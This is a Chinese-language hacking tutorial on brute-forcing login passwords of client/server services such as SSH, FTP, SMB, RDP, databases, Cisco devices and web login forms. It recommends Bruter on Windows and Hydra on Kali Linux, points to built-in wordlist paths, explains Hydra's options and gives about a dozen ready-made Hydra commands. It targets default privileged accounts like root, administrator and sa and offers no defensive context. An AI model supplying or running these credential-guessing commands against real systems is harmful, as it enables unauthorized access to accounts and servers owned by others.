CS架暴力猜解
指軟件,數據庫,操作系統,3389相關的破解。C/S 即客戶端/服務器,基於 C/S 架構的應用程序 如 ssh ftp
sql-server mysql 等,這些服務往往提供一個高權限的用戶,而這個高權限的用戶往往可以進行執行命令的操作,如sql-server 的 sa ,mysql 的 root,oracle 的 sys 和 system帳號,使用這些高權限的用戶能在很大程度上給開發人員帶來方便,但如果口令被破解帶來的危害也是相當大的。C/S 架構主要使用的破解工具 Hydra、Bruter、X-scan
window下建議使用bruter
添加地址,選擇協議(目標Linux選SSH2,windows用SMB,數據庫MYSQL,郵箱POP3),端口(小技巧:Linux默認22,不知道就利用nmap掃一下,telnet+Ip+端口,看一下哪個用的是SSH2)
linux默認用戶名一般是root,windows是administrator
選擇字典(注意不支持中文目錄)
開始
也可以用自帶功能
設置密碼長度
Linux下建議使用hydra
kali自帶
也可以自己下載安裝
注意hydra-gtk是圖形化界面的
hydra 是著名黑客組織 thc 的一款開源的暴力密碼破解工具,可以在線破解多種密碼。官網:http://www.thc.org/thc-hydra
kail 密碼字典
/usr/share/wfuzz/wordlist/others/names.txt
/usr/share/wfuzz/wordlist/others/common_pass.txt
在該界面指定用戶名和密碼列表文件,這裏使用 Kali 系統中存在的用戶名和
密碼列表文件,並選擇 Loop around users 選項。其中,用戶名和密碼文件
分別保存在/usr/share/wfuzz/wordlist/others/names.txt 和
/usr/share/wfuzz/wordlist/others/common_pass.txt 中
參數
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 繼續從上一次進度接着破解。
-S 採用 SSL 鏈接。
-s PORT 可通過這個參數指定非默認端口。
-l LOGIN 指定破解的用戶名,對特定用戶破解。
-L FILE 指定用戶名字典。
-p PASS 小寫,指定密碼破解,少用,一般是採用密碼字典。
-P FILE 大寫,指定密碼字典。
-e ns 可選選項,n:空密碼試探,s:使用指定用戶和密碼試探。
一般都是加上的
-C FILE 使用冒號分割格式,例如“登錄名:密碼”來代替-L/-P 參數。
-M FILE 指定目標列表文件一行一條。
-o FILE 指定結果輸出文件。
-f 在使用-M 參數以後,找到第一對登錄名或者密碼的時候中止破解。
-t TASKS 同時運行的線程數,默認爲 16。 -w TIME 設置最大超時的時間,單位秒,默認是 30s。 -v / -V 顯示詳細過程。
server 目標 ip
service 指定服務名,支持的服務和協議:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt
http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 l
dap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp
rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd fi
rebird ncp afp 等等。
OPT 可選項
使用舉例
1.手動創建用戶名字典和密碼字典,需要利用密碼字典生成器生成強大的字典
2.破解 ssh:
#hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.8 ssh
破解成功,直接顯示結果。也可以使用 -o 選項指定結果輸出文件。
#hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh
1.破解 ssh:
# hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip ssh
# hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh
2.破解 ftp:
# hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認 16) -vV
# hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV
3.get 方式提交,破解 web 登錄:
# hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/
# hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.php
4.post 方式提交,破解 web 登錄:
# hydra -l 用戶名 -P 密碼字典 -s 80 ip http-post-form "/admin/login.php:username =^USER^&password=^PASS^&submit=login:sorry password"
# hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "log in.php:id=^USER^&passwd=^PASS^:wrong username or password"
(參數說明:-t 同時線程數 3,-l 用戶名是 admin,字典 pass.txt,保存爲 out.txt,-f 當破解了一個密碼就停止, 10.36.16.18 目標 ip,http-post-form 表示破解是採用 http 的 post 方式提交的表單密碼破解,<title>中的內容是表示錯誤猜解的返回信息提示。)
5.破解 https:
# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
6.破解 teamspeak:
# hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak
7.破解 cisco:
# hydra -P pass.txt 10.36.16.18 cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
8.破解 smb:
# hydra -l administrator -P pass.txt 10.36.16.18 smb
9.破解 pop3:
# hydra -l muts -P pass.txt my.pop3.mail pop3
10.破解 rdp:
# hydra ip rdp -l administrator -P pass.txt -V
11.破解 http-proxy:
# hydra -l admin -P pass.txt http-proxy://10.36.16.18
12.破解 imap:
# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
關於hydra-gtk的使用
圖形化界面界面比較簡單,直接填寫IP,設置字典,設置協議等
就可以開始了
補充
對於爆破軟件的選擇,主要看速度,穩定性,支持的協議數
這款暴力密碼破解工具相當強大,支持幾乎所有協議的在線密碼破解,
其密碼能否被破解關鍵在於字典是否足夠強大。